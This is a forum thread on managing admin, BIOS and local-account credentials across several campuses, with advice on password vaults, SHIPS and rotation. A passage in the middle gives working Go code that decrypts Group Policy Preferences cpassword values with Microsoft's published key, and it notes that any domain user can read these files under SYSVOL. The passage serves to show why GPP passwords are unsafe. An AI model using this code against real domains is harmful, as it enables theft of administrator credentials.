How do you handle your IT Dept. credentials for end users’ office computer maintenance?

Hi, I have been asked by my supervisor to come up with another solution to simplify our current setup when it comes to dealing with our IT Dept. credentials (backdoor domain accounts, local admin accounts, BIOS, etc.).

Currently, I am using separate domain admin accounts for each location. I have four campuses, to be exact, and since these four locations are manned by part-time techs, we normally have a high turnover rate, because they usually get experience here and then go find a full-time job elsewhere. So, with that in mind, I decided it would be easier and more secure to give each location its own set of credentials (local admin, domain admin, BIOS, test accounts, etc.).

This way, when (not if, but when) a part-time tech leaves, I only need to change the credentials for that location and not across the board for all campuses, like I used to.


In light of this, I have decided to help them keep track of each location's credentials by giving out “Password Cards” to the techs for each location. Well, my supervisor keeps asking me to come up with a more simplified solution because he cannot keep up with all these passwords. The funny thing is he agreed to my solution years ago, but now that he is nearing his last year before retirement he keeps saying there has to be a better way to deal with this scenario.


So, this brings me to ask the question how do you or would you handle such a scenario as mine?


Are there any third-party solutions to address such a need/scenario?


Any advice/suggestions are welcome.


Thanks in advance.



There are many password management solutions out there that you can set up to manage current passwords for accounts of all shapes and sizes, like utility, test and service accounts. Secret Server is a popular one that allows you to tie AD groups or users to particular subsets of accounts, so each can view only those.

With that said, you should be managing as much of this as you can with Active Directory groups. As an example for local administrators, add all of the admins to an AD group like "Local Server Admins" or "Local Machine Admins" and set that group as local administrators on all boxes in the domain (or site) via GPO.






Thanks Brad. Yes, I am taking full advantage of AD, AD groups and GPOs. My question was: if you had multiple (physical) locations, would you approach it as I did, by having a different set of admin (IT Tech or Level 1 Tech) passwords that are just for that location, rather than having one set that encompasses all physical locations?


I believe I have the correct approach, but wanted feedback and to see what others are doing in similar scenarios, before I go back to my supervisor and tell him we are doing it the best way possible at this time.


Thanks again.



Do not use GPOs to push passwords, however; the passwords are world-readable and totally reversible! http://obscuresecurity.blogspot.com/2013/07/get-gpppassword.html
http://www.nathanv.com/2012/07/04/pshell-script-extract-all-gpo-set-passwords-from-domain/
So if you use GPOs to set a standard password across your machines, you should stop :)
Try some software like this: https://www.trustedsec.com/january-2015/introducing-ships-centralized-local-password-management-windows/
SHIPS is nice. We used a homegrown version of something similar for a long time; we didn't know the passwords until we asked for them. They were rotated on a regular basis by our script, but we're using SHIPS now and it's been very good. Make sure you set permissions on setAdminPass.vbs so that only SYSTEM can read/execute the script.
-rich
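To show concretely why the warning above holds, here is an added example (written for this page, not code from the original post, from Get-GPPPassword or from the nathanv script). A Group Policy Preferences Groups.xml stores the local account password in its cpassword attribute as AES-256-CBC ciphertext under a 32-byte key that Microsoft itself documents, with an all-zero IV and PKCS#7 padding over the UTF-16LE password, base64-encoded without the trailing '=' characters. Because the key is the same in every domain and Groups.xml sits under the domain's SYSVOL share, which every authenticated domain user can read, anyone on the domain can recover the password; MS14-025 (May 2014) stopped the GPP editor from writing new passwords but did not remove files already in SYSVOL. The code is in Go rather than PowerShell so it runs anywhere offline; the Groups.xml it parses is constructed at runtime from a made-up password, and the EncryptCPassword helper exists only to build that sample.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// gppKey is the fixed AES-256 key Microsoft documents for Group Policy
// Preferences passwords. It is identical in every domain, which is what makes
// every cpassword value reversible.
var gppKey = []byte{
	0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
	0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b,
}

// Credential is one account/password pair recovered from a Groups.xml.
type Credential struct {
	UserName string
	Password string
}

// gppProps holds the two attributes of a <Properties> element we care about.
type gppProps struct {
	UserName  string `xml:"userName,attr"`
	CPassword string `xml:"cpassword,attr"`
}

// gppGroups mirrors the <Groups><User><Properties/></User></Groups> layout.
type gppGroups struct {
	Props []gppProps `xml:"User>Properties"`
}

// DecryptCPassword reverses a cpassword attribute: restore the base64 '='
// padding Windows strips, AES-256-CBC decrypt under gppKey with a zero IV,
// strip PKCS#7 padding, then decode the UTF-16LE plaintext.
func DecryptCPassword(cpassword string) (string, error) {
	if m := len(cpassword) % 4; m != 0 {
		cpassword += strings.Repeat("=", 4-m)
	}
	ct, err := base64.StdEncoding.DecodeString(cpassword)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("cpassword is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(gppKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding (corrupt value)")
	}
	pt = pt[:len(pt)-n]
	if len(pt)%2 != 0 {
		return "", errors.New("plaintext is not UTF-16LE")
	}
	u := make([]uint16, len(pt)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncryptCPassword produces a cpassword the same way the GPP editor did, so a
// sample Groups.xml can be built without a domain. Output omits base64 padding.
func EncryptCPassword(password string) (string, error) {
	pt := make([]byte, 0, 2*len(password)+aes.BlockSize)
	for _, c := range utf16.Encode([]rune(password)) {
		pt = append(pt, byte(c), byte(c>>8))
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, err := aes.NewCipher(gppKey)
	if err != nil {
		return "", err
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return base64.RawStdEncoding.EncodeToString(ct), nil
}

// ExtractGroupsXML parses a Groups.xml document and decrypts every cpassword
// it carries, skipping entries (e.g. deletions) that set no password.
func ExtractGroupsXML(doc []byte) ([]Credential, error) {
	var g gppGroups
	if err := xml.Unmarshal(doc, &g); err != nil {
		return nil, err
	}
	var out []Credential
	for _, p := range g.Props {
		if p.CPassword == "" {
			continue
		}
		pw, err := DecryptCPassword(p.CPassword)
		if err != nil {
			return nil, fmt.Errorf("user %q: %w", p.UserName, err)
		}
		out = append(out, Credential{UserName: p.UserName, Password: pw})
	}
	return out, nil
}

// SampleGroupsXML builds a constructed Groups.xml (not from any real domain)
// that resets the built-in Administrator password to pw and deletes "olduser".
func SampleGroupsXML(pw string) ([]byte, error) {
	cp, err := EncryptCPassword(pw)
	if err != nil {
		return nil, err
	}
	return []byte(fmt.Sprintf(`<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" cpassword="%s" userName="Administrator (built-in)"/>
  </User>
  <User name="olduser">
    <Properties action="D" userName="olduser"/>
  </User>
</Groups>`, cp)), nil
}

func main() {
	doc, err := SampleGroupsXML("Campus2-L0cal!") // constructed password
	if err != nil {
		panic(err)
	}
	creds, err := ExtractGroupsXML(doc)
	if err != nil {
		panic(err)
	}
	for _, c := range creds {
		fmt.Printf("%s -> %s\n", c.UserName, c.Password)
	}
}
```

Against a real domain the input would be every Groups.xml (and the Services, ScheduledTasks, DataSources and Drives XML files, which use the same attribute) found under \\domain\SYSVOL\domain\Policies, and no privilege beyond an ordinary domain account is needed to read them.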



Thanks Rich. I never knew that about the passwords being stored, but it makes sense. From what I am getting, the passwords are stored in XML files on the domain controller (DC), correct? If so, then I am not too worried, as none of my onsite techs have access to the DCs at any site or HQ. With that in mind, I have used GPO preferences to update the local admin accounts on client desktops in my domain in the past, but haven't done it for a while, mainly because it just takes so long to accomplish, and the scheduling issues of performing this in labs and staff office computers these days are becoming next to impossible during normal business hours.

I guess I was originally asking what policies and procedures you have in place to handle critical passwords for managing multiple sites, especially if you have onsite techs (aka Level 1 techs) there to assist at each site, knowing you have a higher turnover rate at some sites than others.

Not necessarily the technical side of managing your passwords, but the departmental procedures/policies.

Thanks.



They can be one and the same. Using a program like SHIPS, the passwords can be known to anyone with access; it will rotate them on the schedule you dictate, and they will be useless the next day if that's your time frame (it could be hourly). There are passwords that SHIPS can't help you with: sometimes someone has to type them, and they will be known to that person; service accounts that have to be used in third-party tools, for instance. These have to be handled in different ways, as you've indicated. A password rotation policy should help: when someone with level-x access (admin, third-party vendor, etc.) exits, you have a procedure to change/reset the passwords. You have to have that procedure for new services as they come in, as well as for the established ones.
For us, when someone with high-level access leaves, we have to rotate a bunch of accounts, not because they necessarily had access to them, but because they could have gained access to them while employed. And when that happens more than once, close together, it's frustrating, but we still have to follow the procedure. SHIPS, and previously the homegrown scripts we had for password rotation, certainly make a lot of that easier.
-rich
